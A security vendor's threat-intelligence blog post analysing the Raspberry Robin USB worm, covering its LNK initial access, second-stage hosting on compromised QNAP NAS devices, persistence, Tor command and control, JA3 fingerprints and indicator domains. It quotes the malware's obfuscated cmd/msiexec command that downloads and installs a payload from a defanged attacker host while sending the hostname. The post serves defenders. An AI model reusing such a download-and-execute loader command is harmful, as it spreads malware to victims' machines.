This post was written by Brad Freeman, Director of Tech at SenseOn.

SenseOn has investigated a recent Raspberry Robin infection chain as part of our threat intelligence efforts.

In this article, our cybersecurity analyst team explores recent findings from this research.

Read on to see how our team leveraged SenseOn’s advanced telemetry to present security researchers and professionals with a new level of insight into the Raspberry Robin attack chain.

The Raspberry Robin Worm

First spotted in the wild in 2021, Raspberry Robin is a type of worm-like malware replicating itself through removable USB flash drives. In Q4 last year, Raspberry Robin was estimated to have compromised over 1,000 organisations per month.

Highly evasive and constantly evolving, Raspberry Robin has been linked to the Russian cybercriminal gang Evil Corp via attack chains involving the Dridex trojan.

Raspberry Robin cyberattacks start through a variety of methods. The most common involves attackers using social engineering techniques to get targets to use unknown USBs (i.e., compromised USB devices).

Once the compromised thumb drive comes into contact with a target’s USB drive, Raspberry Robin gains initial access through malicious LNK files. It then downloads the second stage of the infection chain via a compromised QNAP NAS device.

Whilst the malware gains persistence and archives command and control through Tor, it does not immediately attempt financial gain from the compromise itself.

Broader reporting indicates that Raspberry Robin’s operators are an initial access broker who sells remote access to compromised systems to third parties who may launch Cobalt Strike or ransomware strains such as LockBit ransomware. 

Initial Access

Raspberry Robin creates shortcuts known as LNK files in the root of USB removable media devices (i.e., a USB stick) connected to infected systems by using a technique identified by MITRE as Replication Through Removable Media (T1091).

The LNK files Raspberry Robin creates often use innocuous icons and names such as Explorer, Report or Update.

Their target is opening the Windows command line and downloading and installing the second stage. This can occur automatically through an autorun.inf file or through User Execution.

The full target is shown below:

%WIndir%\sySTem32\cmd.EXe /D /v/rS^tA^R^T M^S^i^E^X^E^c e^h^T^y=^E^d -^Q^u^I^eT ^a^xQNK=^R^W^Z -P^a^ckag^E
“hTTp://q0[.]Wf:8080/AJyth/oVBh1234eABgjbGZIVdQpfnRJwW//!COmPUTeRName!”
D^z^j^g^z=o^Y^z^j^b

In this case, the LNK file uses the Windows command line to download the second stage and install it via MSIExec. 

The device’s hostname is sent in the HTTP request, as shown in the telemetry below. 

A Windows Installer user agent is used to allow the request to download the second stage via HTTP and from msiexec.

QNAP NAS Devices Hosting Second Stage

The LNK downloads the second stage over HTTP running on port 8080.

In the attack chains SenseOn studied, our team was able to analyse 36 recently used second-stage servers. Then, by reviewing the host history on Shodan, we found that every host appeared to be a compromised QNAP NAS device.

This is interesting because using compromised QNAP devices as a proxy obscures the actual location for hosting the second stage. 

Plus, by using a high number of proxies, this obfuscation technique hampers efforts to block the infection chain through common web-based filtering.

Also, whilst each host could have been accessed via an IP address, the threat actor had registered a domain name for each proxy. We noted significant diversity in the TLDs and registrars used.

Threat Actor Possibly Based In the Americas

SenseOn was able to record and analyse the time of day that command and control domain names were registered. Our team plotted a summary of the activity on the graph below.

Most domains we saw were registered in a timezone consistent with an actor based in The Americas.

Second Stage Execution

The second stage in the infection chain involves an MSI file. 

After a long wait of greater than 5 minutes, this file injects itself into explorer. This is a common anti-analysis method to evade sandbox systems. 

In the example SenseOn studied, the Raspberry Robin also exhibited debugger evasion and refused to execute in a virtual environment.

We then observed a range of malicious DLLs being loaded and used. The DLL names changed frequently and did not remain static.

The MSI used for the loader and the files used for persistence were heavily packed and encrypted.

These files were appropriately 500MB which may be a method to impair defences as some scanning engines won’t scan large files. Often these files will compress to less than 2MB.

Persistence via RunOnceEx Registry Keys

Persistence is achieved by creating a RunOnceEx Registry Key. RunOnceEx clears the registry key after it is run.

 Both the name of the key and the filename are randomly generated.

The file is accessed by the malware constantly. Other processes can’t read it.

Attempts to Open the Firewall

Requests were made to open the firewall via UPnP. The malware may likely attempt to open a socket on the firewall via UPnP.

Command and Control

Command and control is achieved through the Tor network. Connections are made on average once every 60 seconds with a variance of +/- 60 seconds.

All command and control connections are sourced from either dllhost.exe or regsvr32.exe with the parent process of explorer.exe. As the connections go to the Tor network, they can be tough to detect and block using network information alone.

JA3 Fingerprints

The JA3 client fingerprints remained static as Raspberry Robin uses native Windows 10 sockets and keeps the fingerprint. This can provide a good pivot point for threat hunting, but it isn’t a high confidence indicator as other applications may use it.

Client Fingerprints

• JA3 Hash: c12f54a3f91dc7bafd92cb59fe009a35
• JA3_fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-65281,29-23-24,0

Server Fingerprints

• JA3s_hash: e54965894d6b45ecb4323c7ea3d6c115
• JA3s_fingerprint: 771,49200,65281-11-23

Conclusion

USB use might be in decline but malware like Raspberry Robin remains a serious cybersecurity threat.

As our analysis demonstrates, Raspberry Robin is an evasive malware strain that uses multiple layers of obfuscation to evade both static and dynamic analysis, making reversing difficult. 

Still, the scope of a compromise can be understood using a combination of network and endpoint telemetry through a tool like SenseOn.

Intrusions like the one we studied are likely to become more common as governments take action against threat groups and the profitability of initial access brokerage grows.

Given time, Raspberry Robin will also pass the infected host to another group. This multiplies the risk it poses to organisations. 

The hackers behind Raspberry Robin attacks do not have to deploy payload. They can profit by allowing others to take the higher-risk actions of monetising the compromise with ransomware or stealing sensitive data.

References

• https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe
• https://redcanary.com/blog/raspberry-robin/
• https://therecord.media/microsoft-ties-novel-raspberry-robin-malware-to-evil-corp-cybercrime-syndicate/
• Raspberry Robin’s Roshtyak: A Little Lesson in Trickery – Avast Threat Labs

IOCs

Eznb[.]net 

8t[.]pm

7d[.]rs

Zk[.]qa

27o[.]nl

5g7[.]at

H0[.]pm

1h3[.]me

0j[.]wf

Fgcz[.]net

5ky[.]xyz

0dz[.]me

M0[.]yt

6y.re

6xj[.]xyz

J68[.]info

Nt3[.]xyz

Zjc[.]bz

O7car[.]com

03s30[.]com

W0[.]pm

6uy[.]at

e0[.]wf

13j[.]me

Jrx[.]tw

Bcomb[.]net

5qy[.]ro

Jzm[.]pw

W4[.]nz

J5n[.]xyz

0i[.]pm

Vqdn[.]net

5v0[.]nl

N9fz[.]com

Kj1[.]xyz

6qo[.]at

8t[.]wf

Zxn[.]fyi